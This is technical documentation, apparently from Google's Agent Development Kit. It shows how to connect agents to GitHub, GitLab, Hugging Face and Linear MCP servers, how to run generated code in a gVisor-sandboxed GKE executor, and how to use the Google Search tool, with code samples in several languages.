## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams GITHUB_TOKEN = "YOUR_GITHUB_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="github_agent", instruction="Help users get information from GitHub", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://api.githubcopilot.com/mcp/", headers={ "Authorization": f"Bearer {GITHUB_TOKEN}", "X-MCP-Toolsets": "all", "X-MCP-Readonly": "true" }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const GITHUB_TOKEN = "YOUR_GITHUB_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "github_agent", instruction: "Help users get information from GitHub", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://api.githubcopilot.com/mcp/", header: { Authorization: `Bearer ${GITHUB_TOKEN}`, "X-MCP-Toolsets": "all", "X-MCP-Readonly": "true", }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ---------------------------- | ----------------------------------------------------------------------------------------- | | `context` | Tools that provide context about the current user and GitHub context you are operating in | | `copilot` | Copilot related tools (e.g. 
Copilot Coding Agent) | | `copilot_spaces` | Copilot Spaces related tools | | `actions` | GitHub Actions workflows and CI/CD operations | | `code_security` | Code security related tools, such as GitHub Code Scanning | | `dependabot` | Dependabot tools | | `discussions` | GitHub Discussions related tools | | `experiments` | Experimental features that are not considered stable yet | | `gists` | GitHub Gist related tools | | `github_support_docs_search` | Search docs to answer GitHub product and support questions | | `issues` | GitHub Issues related tools | | `labels` | GitHub Labels related tools | | `notifications` | GitHub Notifications related tools | | `orgs` | GitHub Organization related tools | | `projects` | GitHub Projects related tools | | `pull_requests` | GitHub Pull Request related tools | | `repos` | GitHub Repository related tools | | `secret_protection` | Secret protection related tools, such as GitHub Secret Scanning | | `security_advisories` | Security advisories related tools | | `stargazers` | GitHub Stargazers related tools | | `users` | GitHub User related tools | ## Configuration The Remote GitHub MCP server has optional headers that can be used to configure available toolsets and read-only mode: - `X-MCP-Toolsets`: Comma-separated list of toolsets to enable. (e.g., "repos,issues") - If the list is empty, default toolsets will be used. If a bad toolset is provided, the server will fail to start and emit a 400 bad request status. Whitespace is ignored. - `X-MCP-Readonly`: Enables only "read" tools. - If this header is empty, "false", "f", "no", "n", "0", or "off" (ignoring whitespace and case), it will be interpreted as false. All other values are interpreted as true. 
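The header rules above can be sketched in a few lines of Python. This is only an illustration of the documented behavior, not the server's implementation: the helper names `parse_readonly_header` and `build_github_mcp_headers` are hypothetical, and the sketch assumes "ignoring whitespace" refers to whitespace surrounding the value.

```python
# Hypothetical helpers that mirror the documented header rules.
# They are not part of ADK or the GitHub MCP server.
_FALSE_VALUES = {"", "false", "f", "no", "n", "0", "off"}


def parse_readonly_header(value: str) -> bool:
    """Return how an X-MCP-Readonly value would be interpreted per the rules above."""
    # Assumption: only surrounding whitespace is ignored; case is ignored.
    return value.strip().lower() not in _FALSE_VALUES


def build_github_mcp_headers(
    token: str, toolsets: list[str], readonly: bool = True
) -> dict[str, str]:
    """Build request headers for the remote GitHub MCP server."""
    headers = {
        "Authorization": f"Bearer {token}",
        "X-MCP-Readonly": "true" if readonly else "false",
    }
    # Drop blank entries; when nothing remains, omit the header so the
    # server falls back to its default toolsets.
    names = [name.strip() for name in toolsets if name.strip()]
    if names:
        headers["X-MCP-Toolsets"] = ",".join(names)
    return headers
```

The resulting dictionary could be passed as the `headers` argument of `StreamableHTTPServerParams` in the Python agent example, for instance `build_github_mcp_headers(GITHUB_TOKEN, ["repos", "issues"])`.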
## Additional resources - [GitHub MCP Server Repository](https://github.com/github/github-mcp-server) - [Remote GitHub MCP Server Documentation](https://github.com/github/github-mcp-server/blob/main/docs/remote-server.md) - [Policies and Governance for the GitHub MCP Server](https://github.com/github/github-mcp-server/blob/main/docs/policies-and-governance.md) # GitLab MCP tool for ADK Supported in ADKPythonTypeScript The [GitLab MCP Server](https://docs.gitlab.com/user/gitlab_duo/model_context_protocol/mcp_server/) connects your ADK agent directly to [GitLab.com](https://gitlab.com/) or your self-managed GitLab instance. This integration gives your agent the ability to manage issues and merge requests, inspect CI/CD pipelines, perform semantic code searches, and automate development workflows using natural language. ## Use cases - **Semantic Code Exploration**: Navigate your codebase using natural language. Unlike standard text search, you can query the logic and intent of your code to quickly understand complex implementations. - **Accelerate Merge Request Reviews**: Get up to speed on code changes instantly. Retrieve full merge request contexts, analyze specific diffs, and review commit history to provide faster, more meaningful feedback to your team. - **Troubleshoot CI/CD Pipelines**: Diagnose build failures without leaving your chat. Inspect pipeline statuses and retrieve detailed job logs to pinpoint exactly why a specific merge request or commit failed its checks. 
## Prerequisites - A GitLab account with a Premium or Ultimate subscription and [GitLab Duo](https://docs.gitlab.com/user/gitlab_duo/) enabled - [Beta and experimental features](https://docs.gitlab.com/user/gitlab_duo/turn_on_off/#turn-on-beta-and-experimental-features) enabled in your GitLab settings ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # Replace with your instance URL if self-hosted (e.g., "gitlab.example.com") GITLAB_INSTANCE_URL = "gitlab.com" root_agent = Agent( model="gemini-2.5-pro", name="gitlab_agent", instruction="Help users get information from GitLab", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command="npx", args=[ "-y", "mcp-remote", f"https://{GITLAB_INSTANCE_URL}/api/v4/mcp", "--static-oauth-client-metadata", "{\"scope\": \"mcp\"}", ], ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; // Replace with your instance URL if self-hosted (e.g., "gitlab.example.com") const GITLAB_INSTANCE_URL = "gitlab.com"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "gitlab_agent", instruction: "Help users get information from GitLab", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "mcp-remote", `https://${GITLAB_INSTANCE_URL}/api/v4/mcp`, "--static-oauth-client-metadata", '{"scope": "mcp"}', ], }, }), ], }); export { rootAgent }; ``` Note When you run this agent for the first time, a browser window will open automatically (and an authorization URL will be printed) requesting OAuth permissions. You must approve this request to allow the agent to access your GitLab data. 
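The `mcp-remote` arguments in the Python example include a hand-escaped JSON string. As a minimal sketch, the same argument list can be built with `json.dumps` so the quoting is handled for you; the helper name `gitlab_mcp_remote_args` is hypothetical and not part of ADK or GitLab tooling.

```python
import json


def gitlab_mcp_remote_args(instance_url: str = "gitlab.com", scope: str = "mcp") -> list[str]:
    """Build the npx arguments that launch mcp-remote against a GitLab instance."""
    return [
        "-y",
        "mcp-remote",
        f"https://{instance_url}/api/v4/mcp",
        "--static-oauth-client-metadata",
        # json.dumps produces the same string as the hand-escaped literal.
        json.dumps({"scope": scope}),
    ]
```

For a self-managed instance, `gitlab_mcp_remote_args("gitlab.example.com")` could be passed as the `args` value of `StdioServerParameters`.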
## Available tools | Tool | Description | | ----------------------------- | ------------------------------------------------------------------------- | | `get_mcp_server_version` | Returns the current version of the GitLab MCP server | | `create_issue` | Creates a new issue in a GitLab project | | `get_issue` | Retrieves detailed information about a specific GitLab issue | | `create_merge_request` | Creates a merge request in a project | | `get_merge_request` | Retrieves detailed information about a specific GitLab merge request | | `get_merge_request_commits` | Retrieves the list of commits in a specific merge request | | `get_merge_request_diffs` | Retrieves the diffs for a specific merge request | | `get_merge_request_pipelines` | Retrieves the pipelines for a specific merge request | | `get_pipeline_jobs` | Retrieves the jobs for a specific CI/CD pipeline | | `gitlab_search` | Searches for a term across the entire GitLab instance with the search API | | `semantic_code_search` | Searches for relevant code snippets in a project | ## Additional resources - [GitLab MCP Server Documentation](https://docs.gitlab.com/user/gitlab_duo/model_context_protocol/mcp_server/) # Google Cloud GKE Code Executor tool for ADK Supported in ADKPython v1.14.0 The GKE Code Executor (`GkeCodeExecutor`) provides a secure and scalable method for running LLM-generated code by leveraging the GKE (Google Kubernetes Engine) Sandbox environment, which uses gVisor for workload isolation. For each code execution request, it dynamically creates an ephemeral, sandboxed Kubernetes Job with a hardened Pod configuration. You should use this executor for production environments on GKE where security and isolation are critical. ## How it Works When a request to execute code is made, the `GkeCodeExecutor` performs the following steps: 1. **Creates a ConfigMap:** A Kubernetes ConfigMap is created to store the Python code that needs to be executed. 1. 
**Creates a Sandboxed Pod:** A new Kubernetes Job is created, which in turn creates a Pod with a hardened security context and the gVisor runtime enabled. The code from the ConfigMap is mounted into this Pod. 1. **Executes the Code:** The code is executed within the sandboxed Pod, isolated from the underlying node and other workloads. 1. **Retrieves the Result:** The standard output and error streams from the execution are captured from the Pod's logs. 1. **Cleans Up Resources:** Once the execution is complete, the Job and the associated ConfigMap are automatically deleted, ensuring that no artifacts are left behind. ## Key Benefits - **Enhanced Security:** Code is executed in a gVisor-sandboxed environment with kernel-level isolation. - **Ephemeral Environments:** Each code execution runs in its own ephemeral Pod, to prevent state transfer between executions. - **Resource Control:** You can configure CPU and memory limits for the execution Pods to prevent resource abuse. - **Scalability:** Allows you to run a large number of code executions in parallel, with GKE handling the scheduling and scaling of the underlying nodes. ## System requirements The following requirements must be met to successfully deploy your ADK project with the GKE Code Executor tool: - GKE cluster with a **gVisor-enabled node pool**. - Agent's service account requires specific **RBAC permissions**, which allow it to: - Create, watch, and delete **Jobs** for each execution request. - Manage **ConfigMaps** to inject code into the Job's pod. - List **Pods** and read their **logs** to retrieve the execution result - Install the client library with GKE extras: `pip install google-adk[gke]` For a complete, ready-to-use configuration, see the [deployment_rbac.yaml](https://github.com/google/adk-python/blob/main/contributing/samples/gke_agent_sandbox/deployment_rbac.yaml) sample. 
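To make the "How it Works" steps more concrete, the sketch below builds a Kubernetes Job manifest of the kind described: a Pod that runs under the gVisor runtime, mounts code from a ConfigMap, and applies a restrictive security context. It is an illustration under stated assumptions, not the manifest that `GkeCodeExecutor` actually generates. The function name, the container name, the `/app/code.py` path, the ConfigMap key `code.py`, and the exact security settings are all assumptions.

```python
def build_sandboxed_job(
    job_name: str,
    configmap_name: str,
    namespace: str = "default",
    image: str = "python:3.11-slim",
    cpu_limit: str = "500m",
    mem_limit: str = "512Mi",
) -> dict:
    """Return an illustrative Job manifest for one sandboxed code execution."""
    container = {
        "name": "code-runner",  # hypothetical container name
        "image": image,
        # Assumes the ConfigMap stores the code under the key "code.py".
        "command": ["python3", "/app/code.py"],
        "volumeMounts": [{"name": "code", "mountPath": "/app"}],
        "securityContext": {
            "runAsNonRoot": True,
            "allowPrivilegeEscalation": False,
            "readOnlyRootFilesystem": True,
            "capabilities": {"drop": ["ALL"]},
        },
        "resources": {"limits": {"cpu": cpu_limit, "memory": mem_limit}},
    }
    return {
        "apiVersion": "batch/v1",
        "kind": "Job",
        "metadata": {"name": job_name, "namespace": namespace},
        "spec": {
            "backoffLimit": 0,  # do not retry failed executions
            "template": {
                "spec": {
                    "runtimeClassName": "gvisor",  # GKE Sandbox runtime class
                    "restartPolicy": "Never",
                    "containers": [container],
                    "volumes": [
                        {"name": "code", "configMap": {"name": configmap_name}}
                    ],
                }
            },
        },
    }
```

A manifest like this would be submitted with a Kubernetes client, which is why the agent's service account needs permission to create Jobs and ConfigMaps and to read Pod logs.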
For more information on deploying ADK workflows to GKE, see [Deploy to Google Kubernetes Engine (GKE)](/adk-docs/deploy/gke/). ```python from google.adk.agents import LlmAgent from google.adk.code_executors import GkeCodeExecutor # Initialize the executor, targeting the namespace where its ServiceAccount # has the required RBAC permissions. # This example also sets a custom timeout and resource limits. gke_executor = GkeCodeExecutor( namespace="agent-sandbox", timeout_seconds=600, cpu_limit="1000m", # 1 CPU core mem_limit="1Gi", ) # The agent now uses this executor for any code it generates. gke_agent = LlmAgent( name="gke_coding_agent", model="gemini-2.0-flash", instruction="You are a helpful AI agent that writes and executes Python code.", code_executor=gke_executor, ) ``` ## Configuration parameters The `GkeCodeExecutor` can be configured with the following parameters: | Parameter | Type | Description | | -------------------- | ----- | --------------------------------------------------------------------------------------------------------------------- | | `namespace` | `str` | Kubernetes namespace where the execution Jobs will be created. Defaults to `"default"`. | | `image` | `str` | Container image to use for the execution Pod. Defaults to `"python:3.11-slim"`. | | `timeout_seconds` | `int` | Timeout in seconds for the code execution. Defaults to `300`. | | `cpu_requested` | `str` | Amount of CPU to request for the execution Pod. Defaults to `"200m"`. | | `mem_requested` | `str` | Amount of memory to request for the execution Pod. Defaults to `"256Mi"`. | | `cpu_limit` | `str` | Maximum amount of CPU the execution Pod can use. Defaults to `"500m"`. | | `mem_limit` | `str` | Maximum amount of memory the execution Pod can use. Defaults to `"512Mi"`. | | `kubeconfig_path` | `str` | Path to a kubeconfig file to use for authentication. Falls back to in-cluster config or the default local kubeconfig. 
| | `kubeconfig_context` | `str` | The `kubeconfig` context to use. | # Gemini API Google Search tool for ADK Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.2.0 The `google_search` tool allows the agent to perform web searches using Google Search. The `google_search` tool is only compatible with Gemini 2 models. For further details of the tool, see [Understanding Google Search grounding](/adk-docs/grounding/google_search_grounding/). Additional requirements when using the `google_search` tool When you use grounding with Google Search, and you receive Search suggestions in your response, you must display the Search suggestions in production and in your applications. For more information on grounding with Google Search, see Grounding with Google Search documentation for [Google AI Studio](https://ai.google.dev/gemini-api/docs/grounding/search-suggestions) or [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/grounding/grounding-search-suggestions). The UI code (HTML) is returned in the Gemini response as `renderedContent`, and you will need to show the HTML in your app, in accordance with the policy. Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/#one-tool-one-agent). ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
from google.adk.agents import Agent
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from google.adk.tools import google_search
from google.genai import types

APP_NAME = "google_search_agent"
USER_ID = "user1234"
SESSION_ID = "1234"

root_agent = Agent(
    name="basic_search_agent",
    model="gemini-2.0-flash",
    description="Agent to answer questions using Google Search.",
    instruction="I can answer your questions by searching the internet. Just ask me anything!",
    # google_search is a pre-built tool which allows the agent to perform Google searches.
    tools=[google_search]
)

# Session and Runner
async def setup_session_and_runner():
    session_service = InMemorySessionService()
    session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID)
    runner = Runner(agent=root_agent, app_name=APP_NAME, session_service=session_service)
    return session, runner

# Agent Interaction
async def call_agent_async(query):
    content = types.Content(role='user', parts=[types.Part(text=query)])
    session, runner = await setup_session_and_runner()
    events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    async for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("Agent Response: ", final_response)

# Note: In Colab, you can directly use 'await' at the top level.
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop.
await call_agent_async("what's the latest ai news?")
```

```typescript
import {GOOGLE_SEARCH, LlmAgent} from '@google/adk';

export const rootAgent = new LlmAgent({
  model: 'gemini-2.5-flash',
  name: 'root_agent',
  description:
    'an agent whose job it is to perform Google search queries and answer questions about the results.',
  instruction:
    'You are an agent whose job is to perform Google search queries and answer questions about the results.',
  tools: [GOOGLE_SEARCH],
});
```

```go
// Copyright 2025 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package main

import (
	"context"
	"fmt"
	"log"

	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/model/gemini"
	"google.golang.org/adk/runner"
	"google.golang.org/adk/session"
	"google.golang.org/adk/tool"
	"google.golang.org/adk/tool/geminitool"
	"google.golang.org/genai"
)

func createSearchAgent(ctx context.Context) (agent.Agent, error) {
	model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{})
	if err != nil {
		return nil, fmt.Errorf("failed to create model: %v", err)
	}

	return llmagent.New(llmagent.Config{
		Name:        "basic_search_agent",
		Model:       model,
		Description: "Agent to answer questions using Google Search.",
		Instruction: "I can answer your questions by searching the web. Just ask me anything!",
		Tools:       []tool.Tool{geminitool.GoogleSearch{}},
	})
}

const (
	userID  = "user1234"
	appName = "google_search_agent"
)

func callAgent(ctx context.Context, a agent.Agent, prompt string) error {
	sessionService := session.InMemoryService()
	session, err := sessionService.Create(ctx, &session.CreateRequest{
		AppName: appName,
		UserID:  userID,
	})
	if err != nil {
		return fmt.Errorf("failed to create the session: %v", err)
	}

	config := runner.Config{
		AppName:        appName,
		Agent:          a,
		SessionService: sessionService,
	}
	r, err := runner.New(config)
	if err != nil {
		return fmt.Errorf("failed to create the runner: %v", err)
	}

	sessionID := session.Session.ID()
	userMsg := &genai.Content{
		Parts: []*genai.Part{{Text: prompt}},
		Role:  string(genai.RoleUser),
	}

	// The r.Run method streams events and errors.
	// The loop iterates over the results, handling them as they arrive.
	for event, err := range r.Run(ctx, userID, sessionID, userMsg, agent.RunConfig{
		StreamingMode: agent.StreamingModeSSE,
	}) {
		if err != nil {
			fmt.Printf("\nAGENT_ERROR: %v\n", err)
		} else if event.Partial {
			for _, p := range event.LLMResponse.Content.Parts {
				fmt.Print(p.Text)
			}
		}
	}
	return nil
}

func main() {
	agent, err := createSearchAgent(context.Background())
	if err != nil {
		log.Fatalf("Failed to create agent: %v", err)
	}
	fmt.Println("Agent created:", agent.Name())
	prompt := "what's the latest ai news?"
fmt.Printf("\nPrompt: %s\nResponse: ", prompt) if err := callAgent(context.Background(), agent, prompt); err != nil { log.Fatalf("Error calling agent: %v", err) } fmt.Println("\n---") } ``` ```java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.GoogleSearchTool; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; public class GoogleSearchAgentApp { private static final String APP_NAME = "Google Search_agent"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "1234"; /** * Calls the agent with the given query and prints the final response. * * @param runner The runner to use. * @param query The query to send to the agent. */ public static void callAgent(Runner runner, String query) { Content content = Content.fromParts(Part.fromText(query)); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { if (event.finalResponse() && event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { String finalResponse = event.content().get().parts().get().get(0).text().get(); System.out.println("Agent Response: " + finalResponse); } }); } public static void main(String[] args) { // Google Search is a pre-built tool which allows the agent to perform Google searches. 
    GoogleSearchTool googleSearchTool = new GoogleSearchTool();

    BaseAgent rootAgent =
        LlmAgent.builder()
            .name("basic_search_agent")
            .model("gemini-2.0-flash") // Ensure to use a Gemini 2.0 model for Google Search Tool
            .description("Agent to answer questions using Google Search.")
            .instruction(
                "I can answer your questions by searching the internet. Just ask me anything!")
            .tools(ImmutableList.of(googleSearchTool))
            .build();

    // Session and Runner
    InMemorySessionService sessionService = new InMemorySessionService();
    Runner runner = new Runner(rootAgent, APP_NAME, null, sessionService);

    // Agent Interaction
    callAgent(runner, "what's the latest ai news?");
  }
}
```

# Hugging Face MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Hugging Face MCP Server](https://github.com/huggingface/hf-mcp-server) can be used to connect your ADK agent to the Hugging Face Hub and thousands of Gradio AI Applications.

## Use cases

- **Discover AI/ML Assets**: Search and filter the Hub for models, datasets, and papers based on tasks, libraries, or keywords.
- **Build Multi-Step Workflows**: Chain tools together, such as transcribing audio with one tool and then summarizing the resulting text with another.
- **Find AI Applications**: Search for Gradio Spaces that can perform a specific task, like background removal or text-to-speech.

## Prerequisites

- Create a [user access token](https://huggingface.co/settings/tokens) in Hugging Face. Refer to the [documentation](https://huggingface.co/docs/hub/en/security-tokens) for more information.
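
Instead of hardcoding the access token in source files, you may prefer to read it from the environment. The following is a minimal sketch, assuming the token has been exported as `HF_TOKEN`. The helper names `load_hf_token` and `bearer_header` are hypothetical and are not part of ADK or any Hugging Face library.

```python
import os


def load_hf_token(env=None):
    """Return the token stored in HF_TOKEN, or raise if it is missing.

    `env` defaults to os.environ; passing a plain dict makes the helper easy to test.
    """
    env = os.environ if env is None else env
    token = env.get("HF_TOKEN", "").strip()
    if not token:
        raise RuntimeError("Set the HF_TOKEN environment variable to your access token.")
    return token


def bearer_header(token):
    """Build the Authorization header for an HTTP connection to the hosted server."""
    return {"Authorization": f"Bearer {token}"}
```

The value returned by `load_hf_token()` can stand in for a hardcoded token constant, which keeps the secret out of version control.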
## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="hugging_face_agent", instruction="Help users get information from Hugging Face", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command="npx", args=[ "-y", "@llmindset/hf-mcp-server", ], env={ "HF_TOKEN": HUGGING_FACE_TOKEN, } ), timeout=30, ), ) ], ) ``` ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="hugging_face_agent", instruction="Help users get information from Hugging Face", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://huggingface.co/mcp", headers={ "Authorization": f"Bearer {HUGGING_FACE_TOKEN}", }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "hugging_face_agent", instruction: "Help users get information from Hugging Face", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: ["-y", "@llmindset/hf-mcp-server"], env: { HF_TOKEN: HUGGING_FACE_TOKEN, }, }, }), ], }); export { rootAgent }; ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "hugging_face_agent", instruction: "Help users get information from Hugging Face", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: 
"https://huggingface.co/mcp", header: { Authorization: `Bearer ${HUGGING_FACE_TOKEN}`, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ----------------------------- | ---------------------------------------------------------- | | Spaces Semantic Search | Find the best AI Apps via natural language queries | | Papers Semantic Search | Find ML Research Papers via natural language queries | | Model Search | Search for ML models with filters for task, library, etc… | | Dataset Search | Search for datasets with filters for author, tags, etc… | | Documentation Semantic Search | Search the Hugging Face documentation library | | Hub Repository Details | Get detailed information about Models, Datasets and Spaces | ## Configuration To configure which tools are available in your Hugging Face Hub MCP server, visit the [MCP Settings Page](https://huggingface.co/settings/mcp) in your Hugging Face account. To configure the local MCP server, you can use the following environment variables: - `TRANSPORT`: The transport type to use (`stdio`, `sse`, `streamableHttp`, or `streamableHttpJson`) - `DEFAULT_HF_TOKEN`: ⚠️ Requests are serviced with the `HF_TOKEN` received in the Authorization: Bearer header. The DEFAULT_HF_TOKEN is used if no header was sent. Only set this in Development / Test environments or for local STDIO Deployments. ⚠️ - If running with stdio transport, `HF_TOKEN` is used if `DEFAULT_HF_TOKEN` is not set. - `HF_API_TIMEOUT`: Timeout for Hugging Face API requests in milliseconds (default: 12500ms / 12.5 seconds) - `USER_CONFIG_API`: URL to use for User settings (defaults to Local front-end) - `MCP_STRICT_COMPLIANCE`: set to True for GET 405 rejects in JSON Mode (default serves a welcome page). 
- `AUTHENTICATE_TOOL`: whether to include an Authenticate tool to issue an OAuth challenge when called
- `SEARCH_ENABLES_FETCH`: When set to true, automatically enables the `hf_doc_fetch` tool whenever `hf_doc_search` is enabled

## Additional resources

- [Hugging Face MCP Server Repository](https://github.com/huggingface/hf-mcp-server)
- [Hugging Face MCP Server Documentation](https://huggingface.co/docs/hub/en/hf-mcp-server)

# Linear MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Linear MCP Server](https://linear.app/docs/mcp) connects your ADK agent to [Linear](https://linear.app/), a purpose-built tool for planning and building products. This integration gives your agent the ability to manage issues, track project cycles, and automate development workflows using natural language.

## Use cases

- **Streamline Issue Management**: Create, update, and organize issues using natural language. Let your agent handle logging bugs, assigning tasks, and updating statuses.
- **Track Projects and Cycles**: Get instant visibility into your team's momentum. Query the status of active cycles, check project milestones, and retrieve deadlines.
- **Contextual Search & Summarization**: Quickly catch up on long discussion threads or find specific project specifications. Your agent can search documentation and summarize complex issues.
## Prerequisites - [Sign up](https://linear.app/signup) for a Linear account - Generate an API key in [Linear Settings > Security & access](https://linear.app/docs/security-and-access) (if using API authentication) ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters root_agent = Agent( model="gemini-2.5-pro", name="linear_agent", instruction="Help users manage issues, projects, and cycles in Linear", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "mcp-remote", "https://mcp.linear.app/mcp", ] ), timeout=30, ), ) ], ) ``` Note When you run this agent for the first time, a browser window will open automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Linear data. ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams LINEAR_API_KEY = "YOUR_LINEAR_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="linear_agent", instruction="Help users manage issues, projects, and cycles in Linear", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://mcp.linear.app/mcp", headers={ "Authorization": f"Bearer {LINEAR_API_KEY}", }, ), ) ], ) ``` Note This code example uses an API key for authentication. To use a browser-based OAuth authentication flow instead, remove the `headers` parameter and run the agent. 
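
The choice between API-key and OAuth authentication can also be made at runtime. The following is a minimal sketch, assuming the key is stored in an environment variable named `LINEAR_API_KEY` (an assumed name). The helper `linear_connection_kwargs` is hypothetical: it only builds keyword arguments and includes `headers` when a key is present, so that omitting the key falls back to the browser-based OAuth flow described in the note.

```python
import os

LINEAR_MCP_URL = "https://mcp.linear.app/mcp"


def linear_connection_kwargs(env=None):
    """Return keyword arguments for the HTTP connection parameters.

    `headers` is added only when LINEAR_API_KEY is set; without it, the
    connection is left to authenticate through OAuth.
    """
    env = os.environ if env is None else env
    kwargs = {"url": LINEAR_MCP_URL}
    api_key = env.get("LINEAR_API_KEY", "").strip()
    if api_key:
        kwargs["headers"] = {"Authorization": f"Bearer {api_key}"}
    return kwargs
```

With this helper, the connection could be created as `StreamableHTTPServerParams(**linear_connection_kwargs())`.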
```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "linear_agent", instruction: "Help users manage issues, projects, and cycles in Linear", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: ["-y", "mcp-remote", "https://mcp.linear.app/mcp"], }, }), ], }); export { rootAgent }; ``` Note When you run this agent for the first time, a browser window will open automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Linear data. ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const LINEAR_API_KEY = "YOUR_LINEAR_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "linear_agent", instruction: "Help users manage issues, projects, and cycles in Linear", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://mcp.linear.app/mcp", header: { Authorization: `Bearer ${LINEAR_API_KEY}`, }, }), ], }); export { rootAgent }; ``` Note This code example uses an API key for authentication. To use a browser-based OAuth authentication flow instead, remove the `header` property and run the agent. 
## Available tools

| Tool                   | Description                  |
| ---------------------- | ---------------------------- |
| `list_comments`        | List comments on an issue    |
| `create_comment`       | Create a comment on an issue |
| `list_cycles`          | List cycles in a project     |
| `get_document`         | Get a document               |
| `list_documents`       | List documents               |
| `get_issue`            | Get an issue                 |
| `list_issues`          | List issues                  |
| `create_issue`         | Create an issue              |
| `update_issue`         | Update an issue              |
| `list_issue_statuses`  | List issue statuses          |
| `get_issue_status`     | Get an issue status          |
| `list_issue_labels`    | List issue labels            |
| `create_issue_label`   | Create an issue label        |
| `list_projects`        | List projects                |
| `get_project`          | Get a project                |
| `create_project`       | Create a project             |
| `update_project`       | Update a project             |
